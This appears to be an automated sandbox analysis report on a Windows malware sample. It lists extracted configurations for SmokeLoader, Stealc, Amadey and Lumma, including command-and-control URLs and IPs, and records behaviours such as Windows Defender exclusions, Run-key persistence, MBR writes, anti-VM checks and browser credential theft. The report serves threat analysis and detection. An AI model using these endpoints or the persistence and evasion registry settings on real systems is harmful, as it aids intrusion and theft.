Analysis
-
max time kernel
290s -
max time network
309s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
21-03-2024 22:17
Static task
static1
Behavioral task
behavioral1
Sample
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe
Resource
win10-20240221-en
General
-
Target
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe
-
Size
232KB
-
MD5
c8a94b7ff57e67498d621af4bc560022
-
SHA1
ac302a7477cb2f67eee23cc64c69b8bc41b235ef
-
SHA256
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2
-
SHA512
9444db827fd46a9e8b38f44fc29716f2f03be47c9bd89369b00308f14b5995a6149a1cf2cfbaab157795750794e2b929cf0db87b5eee9f73e6b8bff14e357a5f
-
SSDEEP
3072:avIPm6dnTMRl6U9u/RzKiAHwbjetauENUMVon5GoNtHgfJPssqZvoh:pm6dnoGUSRzSXtau2Kn5HfAfJk
Malware Config
Extracted
smokeloader
2022
http://selebration17io.io/index.php
http://vacantion18ffeu.cc/index.php
http://valarioulinity1.net/index.php
http://buriatiarutuhuob.net/index.php
http://cassiosssionunu.me/index.php
http://sulugilioiu19.net/index.php
http://goodfooggooftool.net/index.php
http://nidoe.org/tmp/index.php
http://sodez.ru/tmp/index.php
http://uama.com.ua/tmp/index.php
http://talesofpirates.net/tmp/index.php
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
amadey
4.17
http://185.215.113.32
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
lumma
https://resergvearyinitiani.shop/api
https://herdbescuitinjurywu.shop/api
https://relevantvoicelesskw.shop/api
https://asleepfulltytarrtw.shop/api
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe family_zgrat_v1 -
Glupteba payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/660-81-0x0000000002EE0000-0x00000000037CB000-memory.dmp family_glupteba behavioral2/memory/660-84-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/660-428-0x0000000002EE0000-0x00000000037CB000-memory.dmp family_glupteba behavioral2/memory/660-456-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/660-642-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/660-806-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3568-1132-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3568-1614-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000979001\TeamFour.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
Processes:
random.exeexplorha.exe39617900c5.exeexplorha.exe5822.exeexplorgu.exeexplorha.exeamadka.exeexplorha.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 39617900c5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5822.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amadka.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe -
Blocklisted process makes network request 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exeflow pid process 80 3096 rundll32.exe 109 5836 rundll32.exe 132 5224 rundll32.exe 144 5912 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 4344 netsh.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorgu.exeamadka.exeexplorha.exeexplorha.exeexplorha.exeexplorha.exe39617900c5.exe5822.exerandom.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 39617900c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5822.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5822.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 39617900c5.exe -
Deletes itself 1 IoCs
Processes:
pid process 3336 -
Executes dropped EXE 48 IoCs
Processes:
20E.exe30D1.exeInstallSetup_four.exe288c47bbc1871b439df19ff4df68f076.exeEasyAppns.exeapril.exe3B90.exeapril.tmpEasyApp.exeu2o.0.exe5822.exeu2o.1.exeGDHCGDGIEB.exe288c47bbc1871b439df19ff4df68f076.exeB278.exeBC1D.execsrss.exeexplorgu.exeinjector.exeosminog.exegoldprimeldlldf.exerandom.exeamadka.exewindefender.exefullwork.exeexplorha.exeTeamFour.exewindefender.exe39617900c5.exeexplorgu.exealex1234.exepropro.exeTraffic.exe987123.exeexplorha.exeISetup3.exeyoffens_crypted_EASY.exeu3g8.0.exelumma2.exeu3g8.1.exeexplorha.exevufabtjdbfabtjblue2_A1.exeexplorha.exeTypeId.exeexplorha.exedcb505dc2b9d8aac05f4ca0727f5eadb.exepid process 5072 20E.exe 2896 30D1.exe 96 InstallSetup_four.exe 660 288c47bbc1871b439df19ff4df68f076.exe 3068 EasyAppns.exe 4236 april.exe 3036 3B90.exe 2296 april.tmp 2228 EasyApp.exe 4176 u2o.0.exe 1256 5822.exe 780 u2o.1.exe 4612 GDHCGDGIEB.exe 3568 288c47bbc1871b439df19ff4df68f076.exe 2124 B278.exe 1964 BC1D.exe 4856 csrss.exe 3524 explorgu.exe 2620 injector.exe 4116 osminog.exe 1592 goldprimeldlldf.exe 4640 random.exe 1752 amadka.exe 2580 windefender.exe 5124 fullwork.exe 5288 explorha.exe 5540 TeamFour.exe 5736 windefender.exe 6036 39617900c5.exe 5264 explorgu.exe 5244 alex1234.exe 5716 propro.exe 5680 Traffic.exe 1900 987123.exe 5880 explorha.exe 4472 ISetup3.exe 5184 yoffens_crypted_EASY.exe 5860 u3g8.0.exe 5912 lumma2.exe 5480 u3g8.1.exe 5544 explorha.exe 4428 vufabtj 5244 dbfabtj 3280 blue2_A1.exe 216 explorha.exe 684 TypeId.exe 6044 explorha.exe 5664 dcb505dc2b9d8aac05f4ca0727f5eadb.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
amadka.exe39617900c5.exeexplorha.exeexplorha.exe5822.exeexplorgu.exerandom.exeexplorha.exeexplorha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine amadka.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine 39617900c5.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine 5822.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Wine explorha.exe -
Loads dropped DLL 10 IoCs
Processes:
regsvr32.exeapril.tmpu2o.0.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exepid process 4188 regsvr32.exe 2296 april.tmp 4176 u2o.0.exe 4176 u2o.0.exe 3084 rundll32.exe 3096 rundll32.exe 5836 rundll32.exe 2404 rundll32.exe 5224 rundll32.exe 5912 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Windows\windefender.exe upx C:\Windows\windefender.exe upx -
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" 288c47bbc1871b439df19ff4df68f076.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
GDHCGDGIEB.exe288c47bbc1871b439df19ff4df68f076.exeexplorgu.execsrss.exeexplorha.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDHCGDGIEB.exe" GDHCGDGIEB.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000873001\\random.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000875001\\amadka.exe" explorgu.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\39617900c5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000022001\\39617900c5.exe" explorha.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
BC1D.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 BC1D.exe -
Drops file in System32 directory 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
5822.exeexplorgu.exeamadka.exeexplorha.exeexplorha.exeexplorha.exeexplorha.exepid process 1256 5822.exe 3524 explorgu.exe 1752 amadka.exe 5288 explorha.exe 5544 explorha.exe 216 explorha.exe 6044 explorha.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
B278.exeosminog.exegoldprimeldlldf.exefullwork.exeexplorgu.exealex1234.exeexplorha.exelumma2.exedescription pid process target process PID 2124 set thread context of 4848 2124 B278.exe BitLockerToGo.exe PID 4116 set thread context of 3532 4116 osminog.exe RegAsm.exe PID 1592 set thread context of 2612 1592 goldprimeldlldf.exe RegAsm.exe PID 5124 set thread context of 5528 5124 fullwork.exe RegAsm.exe PID 3524 set thread context of 5264 3524 explorgu.exe explorgu.exe PID 5244 set thread context of 224 5244 alex1234.exe RegAsm.exe PID 5288 set thread context of 5880 5288 explorha.exe explorha.exe PID 5912 set thread context of 5944 5912 lumma2.exe RegAsm.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
288c47bbc1871b439df19ff4df68f076.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 288c47bbc1871b439df19ff4df68f076.exe -
Drops file in Windows directory 6 IoCs
Processes:
288c47bbc1871b439df19ff4df68f076.execsrss.exeamadka.exe5822.exedescription ioc process File opened for modification C:\Windows\rss 288c47bbc1871b439df19ff4df68f076.exe File created C:\Windows\rss\csrss.exe 288c47bbc1871b439df19ff4df68f076.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\explorha.job amadka.exe File created C:\Windows\Tasks\explorgu.job 5822.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5696 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2664 3036 WerFault.exe 3B90.exe 4656 3036 WerFault.exe 3B90.exe 2904 2228 WerFault.exe EasyApp.exe 2628 3532 WerFault.exe RegAsm.exe 5924 5528 WerFault.exe RegAsm.exe 4176 5944 WerFault.exe RegAsm.exe 3772 5944 WerFault.exe RegAsm.exe 4504 5244 WerFault.exe dbfabtj -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe20E.exeu2o.1.exe987123.exeu3g8.1.exevufabtjdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 20E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 20E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2o.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 20E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2o.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3g8.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3g8.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vufabtj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vufabtj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vufabtj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2o.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3g8.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2o.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2o.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2o.0.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 64 schtasks.exe 4628 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 172 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exewindefender.exe288c47bbc1871b439df19ff4df68f076.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 288c47bbc1871b439df19ff4df68f076.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" windefender.exe Set value (str) 